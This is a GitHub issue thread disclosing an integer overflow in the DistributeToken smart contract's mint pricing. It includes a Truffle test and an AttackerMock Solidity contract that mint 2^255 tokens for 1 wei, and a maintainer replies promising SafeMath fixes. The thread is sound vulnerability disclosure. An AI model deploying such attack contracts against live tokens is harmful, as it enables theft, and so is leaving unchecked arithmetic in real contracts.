### ISSUE TITLE
It is possible to do an overflow attack.

### ISSUE THREAD

**Issue by fosgate29** [distribute-protocol/distribute-contracts#53]
It is possible to attack the Token and get a high value of tokens spending only 1 wei.

The is with this line:
https://github.com/distribute-protocol/distribute-contracts/blob/b8a8bf7193afc873b1fa88249deea6e9335372d1/contracts/DistributeToken.sol#L103

If `_tokens` is a high number, like 2 ^ 255, it will overflow and return 0(zero). And since this value will be checked by mint() function, with onle 1 wei I can mint 2^255 tokens.

I noticed there is a lot of maths doing without any checks. All maths must use SafeMath otherwise it will risk an overflow or underflow attack. You don´t need SafeMath only if you are 100% sure the numbers it will get.

Here is my unit test:
```javascript
  it.only('attack overflow tokens', async () => {

    const attacker = await Attacker.new(DT.address , { from: accounts[0] });

    let attackerTokenBalance = await DT.balanceOf.call(attacker.address);

    console.log('Initial attacker token balance: '+attackerTokenBalance.toNumber());
    assert.equal(attackerTokenBalance, 0, 'there should be no tokens in existence before attack minting')

    //attack sending 1 wei
    await attacker.attack( { from: accounts[0] , value: 1 });

    attackerTokenBalance = await DT.balanceOf.call(attacker.address);

    console.log('Attacker token balance after attack: '+attackerTokenBalance.toNumber());

    assert.notEqual(attackerTokenBalance, 0, 'there should be a lot of tokens in existence after attack minting')

  })
```

And here is the AttackerMock smart contract:
```
 
 import "./DistributeToken.sol";

/// @title Sale base contract
contract AttackerMock {
    uint256 public timestamp;
    DistributeToken vulnerable;

    function AttackerMock(address _vulnerable){
      vulnerable = DistributeToken(_vulnerable);
    }

    function attack() external payable{
      uint256 attackNumbers = (2**255) ;
      vulnerable.mint.value(msg.value)(attackNumbers);
    }

    function() public payable{
      //do nothing
    }

    
}
```

**Comment by shkfnly** [comment]
@fosgate29 thanks for submitting this...we'll go through and update all the math
